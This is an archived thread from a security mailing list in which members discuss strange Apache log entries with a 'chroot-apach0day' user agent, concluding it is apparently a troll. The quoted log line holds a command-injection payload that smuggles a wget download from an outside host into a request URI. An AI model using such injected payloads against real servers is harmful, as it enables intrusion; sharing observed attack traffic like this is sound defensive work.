PaulDotCom mailing list archives

Re: [Security Weekly] apache chroot 0day?

From: Eric Buckingham <erikb () proxypipe com>
Date: Mon, 28 Jul 2014 14:38:42 -0400

Looks like an attempt by somebody to troll us sadly :/


On Mon, Jul 28, 2014 at 2:18 PM, Jim Halfpenny <jim.halfpenny () gmail com>
wrote:

It didn't take long to get a pcap of this request, I started httpd on
a random VPS of mine and it's the only request I have received so far.
At first glance it doesn't seem like anything special.

Jim

On 28 July 2014 15:54, Robin Wood <robin@digi.ninja> wrote:




On 28 July 2014 15:30, Frank Michael <frankcmichael () gmail com> wrote:


Various sources confirming the same thing for other sites. All on 7/28.
Keep an eye open.


I've just mailed the SANS ISC about it saying that others had seen it,

see

if they come back with anything.

Robin


On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote:

I've got a site that was scanned this morning by a tool that left these
entries in the logs:

    [HTTP_USER_AGENT] => chroot-apach0day
    [HTTP_REFERRER] => /xA/x0a/x05
    [REQUEST_URI] =>
/?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day


Anyone recognise it? That user agent isn't coming up in google searches.

Robin

_______________________________________________

Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com


_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com




_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Current thread:

[Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Sander Demeester (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Frank Michael (Jul 28)
  - Re: [Security Weekly] apache chroot 0day? Chris Campbell (Jul 28)
  - Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
  - Re: [Security Weekly] apache chroot 0day? Xavier Mertens (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
  - Re: [Security Weekly] apache chroot 0day? xgermx (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Ben Jackson (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
    - Re: [Security Weekly] apache chroot 0day? Bruno Savioli (Jul 29)

(Thread continues...)